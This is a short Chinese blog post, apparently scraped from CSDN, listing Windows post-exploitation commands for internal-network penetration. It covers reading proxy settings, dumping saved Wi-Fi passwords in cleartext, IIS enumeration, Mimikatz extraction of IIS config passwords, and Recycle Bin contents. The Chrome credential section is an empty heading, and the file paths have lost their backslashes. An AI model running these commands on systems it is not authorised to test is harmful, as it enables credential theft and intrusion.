目录
内网渗透之Windows反弹shell(一)_不知名白帽的博客-CSDN博客
01IE浏览器代理信息查看
reg query "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settings"
02Windows Wifi密码获取
netsh wlan show profile
netsh wlan show profile name="ssid" KEY=clear
03Windows hosts config
windows7/windows2008/windows10等:
C:WindowsSystem32driversetchosts
Windows2003:
C:WINDOWSSYSTEM32DRIVERSETCHOSTS
04Windows IIS config
IIS6:
cscript.exe C:InetpubAdminScriptsadsutil.vbs ENUM W3SVC/1/root
IIS7,8:
列出网站列表:%systemroot%/system32/inetsrv/appcmd.exe list site
列出网站物理路径:%systemroot%system32inetsrcappcmd.exe list vdir
Mimikatz读取IIS7配置文件密码:
mimikatz.exe privilege::debug log "iis::apphost
/in:"%systemroot%system32inetsrvconfigapplicationHost.config" /live" exit
05Windows回收站信息获取
目录路径在C:%Recycle.Bin
$I开头的文件保存的是路径信息
$R开头的文件保存的是文件内容
06Chorme的密码和cookie获取
07Windows日志信息查看
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125655789